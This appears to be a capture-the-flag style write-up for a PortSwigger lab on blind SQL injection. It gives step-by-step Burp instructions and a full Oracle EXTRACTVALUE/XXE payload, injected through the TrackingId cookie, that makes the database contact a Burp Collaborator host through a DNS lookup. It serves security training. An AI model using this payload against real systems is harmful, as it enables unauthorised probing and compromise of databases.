[This lab](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band) demonstrates how to leverage **blind SQL injection** for **out-of-band (OOB) interaction** using a **DNS-based side channel**. Since the SQL query executes asynchronously with no visible response, you must confirm exploitation through Burp Collaborator. --- #### Step 1: Intercept and Modify the Cookie 1. Visit the lab homepage 2. In Burp → **Proxy → HTTP history**, find the request to `/` 3. Locate the `TrackingId` cookie: ``` TrackingId=xyz ``` 4. Send the request to **Repeater** --- #### Step 2: Inject SQLi Payload with DNS-Based OOB Call Use Oracle's `EXTRACTVALUE()` on an **external entity** to trigger a DNS lookup: ```sql TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual-- ``` Make sure you **URL-encode** the value inside the actual request (Burp can help): Final payload in raw request: ``` TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual-- ``` _Tip: You can use right-click → **Insert Collaborator payload** directly in Repeater._ --- #### Step 4: Send the Request 1. Click **Send** in Repeater 2. Switch to the **Burp Collaborator Client** 3. Wait for a **DNS interaction** (should appear within seconds) ✅ If you see an **interaction from the lab**, the SQLi was successful ✅ Lab is solved automatically once Burp receives the DNS hit